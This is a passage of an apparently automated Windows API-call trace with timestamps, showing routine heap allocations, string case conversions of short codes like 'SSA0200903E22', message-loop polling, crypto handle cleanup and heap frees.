(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0264.806] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0264.806] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.806] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.806] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.806] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.807] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.807] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.807] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0264.807] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0264.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0264.807] CryptDestroyKey (hKey=0xaa5860) returned 1 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0264.808] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.808] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.808] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.808] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.808] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.809] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.809] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0264.809] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.809] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.809] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.809] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.809] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0264.810] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0264.810] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0264.810] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.810] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.810] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.810] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.810] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.811] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.811] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0264.811] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.811] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.811] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.812] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0264.812] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.812] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0264.812] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.812] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0264.812] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0264.812] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.813] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0264.813] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.813] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.813] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0264.813] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.813] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0264.813] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.814] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0264.814] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.814] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.814] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0264.814] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.814] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0264.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0264.815] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.815] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.815] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0264.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0264.815] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0264.815] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.815] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0264.815] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.815] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.815] CryptReleaseContext (hProv=0xad2c70, dwFlags=0x0) returned 1 [0264.816] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.816] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0264.816] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.816] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0264.816] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.816] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0264.816] FreeLibrary (hLibModule=0x74d40000) returned 1 [0264.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.816] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0264.816] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0264.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0264.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.816] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.817] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 